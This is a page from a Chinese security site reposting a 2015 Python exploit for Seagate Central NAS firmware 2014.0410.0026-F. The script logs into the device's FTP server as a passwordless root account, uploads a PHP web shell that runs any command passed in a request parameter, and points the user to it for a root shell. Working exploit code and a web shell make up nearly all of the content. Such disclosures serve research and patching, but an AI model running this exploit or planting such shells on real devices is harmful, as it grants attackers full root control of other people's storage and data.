首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Seagate Central 2014.0410.0026-F Remote Root Exploit
来源:jbrown3264/gmail 作者:Brown 发布时间:2015-06-05  
#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#
 
import sys
from ftplib import FTP
 
port = 21
 
php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
    $cmd = ($_REQUEST["cmd"]);
    echo "<pre>$cmd</pre>";
    system($cmd);
}
?>
"""
 
php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"
 
def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <host>" % sys.argv[0])
        return
 
    host = sys.argv[1]
 
    try:
        with open(php_shell_filename, 'w') as file:
            file.write(php_shell)
 
    except Exception as error:
        print("Error: %s" % error);
        return
 
    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
        ftp.close()
    
    except Exception as error:
        print("Error: %s" % error);
        return
 
    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
 
    return
 
if __name__ == "__main__":
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PonyOS <= 3.0 - tty ioctl() Lo
·Seagate Central 2014.0410.0026
·Microsoft Windows - Local Priv
·Jildi FTP Client Buffer Overfl
·D-Link Devices HNAP SOAPAction
·Jildi FTP Client 1.5.6 (SEH) B
·IBM Security AppScan 9.0.2 Rem
·JDownloader 2 Beta Directory T
·WebDrive 12.2 Buffer Overflow
·Golden FTP 5.00 Denial Of Serv
·PonyOS 3.0 VFS Privilege Escal
·CmyDocument CMS Database Discl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved